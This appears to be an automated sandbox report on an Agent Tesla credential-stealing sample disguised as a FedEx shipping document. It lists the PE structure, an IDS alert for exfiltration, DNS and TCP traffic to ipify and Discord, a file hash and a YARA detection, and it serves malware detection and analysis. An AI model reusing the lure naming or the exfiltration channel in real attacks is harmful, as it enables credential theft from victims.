                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb6cfd0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x1110.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb58e80x54.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xb4d580xb4e00False0.9268084290774016data7.872797130775443IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xb80000x11100x1200False0.73046875data6.631473125860904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xba0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0xb81000xa79PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                              RT_GROUP_ICON0xb8b8c0x14data
                                              RT_VERSION0xb8bb00x360data
                                              RT_MANIFEST0xb8f200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              192.168.2.7162.159.138.232497014432851779 03/20/23-11:52:05.074477TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49701443192.168.2.7162.159.138.232

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Mar 20, 2023 11:51:49.157324076 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:51:49.157382011 CET4434970064.185.227.155192.168.2.7
                                              Mar 20, 2023 11:51:49.157479048 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:51:49.196374893 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:51:49.196409941 CET4434970064.185.227.155192.168.2.7
                                              Mar 20, 2023 11:51:57.077124119 CET4434970064.185.227.155192.168.2.7
                                              Mar 20, 2023 11:51:57.077359915 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:51:57.808013916 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:51:57.808080912 CET4434970064.185.227.155192.168.2.7
                                              Mar 20, 2023 11:51:57.808967113 CET4434970064.185.227.155192.168.2.7
                                              Mar 20, 2023 11:51:57.874470949 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:51:58.269769907 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:51:58.269812107 CET4434970064.185.227.155192.168.2.7
                                              Mar 20, 2023 11:51:59.014796972 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:51:59.014924049 CET4434970064.185.227.155192.168.2.7
                                              Mar 20, 2023 11:51:59.014995098 CET49700443192.168.2.764.185.227.155
                                              Mar 20, 2023 11:52:04.950087070 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:04.950215101 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:04.950337887 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:04.952203989 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:04.952301979 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.009949923 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.010083914 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:05.014666080 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:05.014695883 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.015054941 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.018209934 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:05.018237114 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.073689938 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.074287891 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:05.074341059 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.421833992 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.422219038 CET44349701162.159.138.232192.168.2.7
                                              Mar 20, 2023 11:52:05.422296047 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:05.424500942 CET49701443192.168.2.7162.159.138.232
                                              Mar 20, 2023 11:52:06.002155066 CET49702443192.168.2.7162.159.135.232
                                              Mar 20, 2023 11:52:06.002207994 CET44349702162.159.135.232192.168.2.7
                                              Mar 20, 2023 11:52:06.002302885 CET49702443192.168.2.7162.159.135.232
                                              Mar 20, 2023 11:52:06.003519058 CET49702443192.168.2.7162.159.135.232
                                              Mar 20, 2023 11:52:06.003566027 CET44349702162.159.135.232192.168.2.7
                                              Mar 20, 2023 11:52:06.051467896 CET44349702162.159.135.232192.168.2.7
                                              Mar 20, 2023 11:52:06.055735111 CET49702443192.168.2.7162.159.135.232
                                              Mar 20, 2023 11:52:06.055769920 CET44349702162.159.135.232192.168.2.7
                                              Mar 20, 2023 11:52:06.124003887 CET44349702162.159.135.232192.168.2.7
                                              Mar 20, 2023 11:52:06.124957085 CET49702443192.168.2.7162.159.135.232
                                              Mar 20, 2023 11:52:06.125015020 CET44349702162.159.135.232192.168.2.7
                                              Mar 20, 2023 11:52:06.437938929 CET44349702162.159.135.232192.168.2.7
                                              Mar 20, 2023 11:52:06.438318968 CET44349702162.159.135.232192.168.2.7
                                              Mar 20, 2023 11:52:06.438410997 CET49702443192.168.2.7162.159.135.232
                                              Mar 20, 2023 11:52:06.440745115 CET49702443192.168.2.7162.159.135.232

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Mar 20, 2023 11:51:49.083699942 CET5947753192.168.2.78.8.8.8
                                              Mar 20, 2023 11:51:49.103337049 CET53594778.8.8.8192.168.2.7
                                              Mar 20, 2023 11:51:49.115154028 CET5575253192.168.2.78.8.8.8
                                              Mar 20, 2023 11:51:49.135409117 CET53557528.8.8.8192.168.2.7
                                              Mar 20, 2023 11:52:04.919559956 CET5033053192.168.2.78.8.8.8
                                              Mar 20, 2023 11:52:04.941693068 CET53503308.8.8.8192.168.2.7
                                              Mar 20, 2023 11:52:05.979279041 CET5658853192.168.2.78.8.8.8
                                              Mar 20, 2023 11:52:06.000864029 CET53565888.8.8.8192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Mar 20, 2023 11:51:49.083699942 CET192.168.2.78.8.8.80xd371Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:51:49.115154028 CET192.168.2.78.8.8.80x7dd7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:04.919559956 CET192.168.2.78.8.8.80x8554Standard query (0)discord.comA (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:05.979279041 CET192.168.2.78.8.8.80xf5aeStandard query (0)discord.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Mar 20, 2023 11:51:49.103337049 CET8.8.8.8192.168.2.70xd371No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                              Mar 20, 2023 11:51:49.103337049 CET8.8.8.8192.168.2.70xd371No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:51:49.103337049 CET8.8.8.8192.168.2.70xd371No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:51:49.103337049 CET8.8.8.8192.168.2.70xd371No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:51:49.135409117 CET8.8.8.8192.168.2.70x7dd7No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                              Mar 20, 2023 11:51:49.135409117 CET8.8.8.8192.168.2.70x7dd7No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:51:49.135409117 CET8.8.8.8192.168.2.70x7dd7No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:51:49.135409117 CET8.8.8.8192.168.2.70x7dd7No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:04.941693068 CET8.8.8.8192.168.2.70x8554No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                              Mar 20, 2023 11:52:06.000864029 CET8.8.8.8192.168.2.70xf5aeNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.ipify.org
                                              • discord.com

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:51:39
                                              Start date:20/03/2023
                                              Path:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              Imagebase:0xe70000
                                              File size:746496 bytes
                                              MD5 hash:5CF87A160007A5E6C7A4D24E1D831327
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low

                                              General

                                              Target ID:1
                                              Start time:11:51:46
                                              Start date:20/03/2023
                                              Path:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              Imagebase:0xac0000
                                              File size:746496 bytes
                                              MD5 hash:5CF87A160007A5E6C7A4D24E1D831327
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Disassembly

                                              No disassembly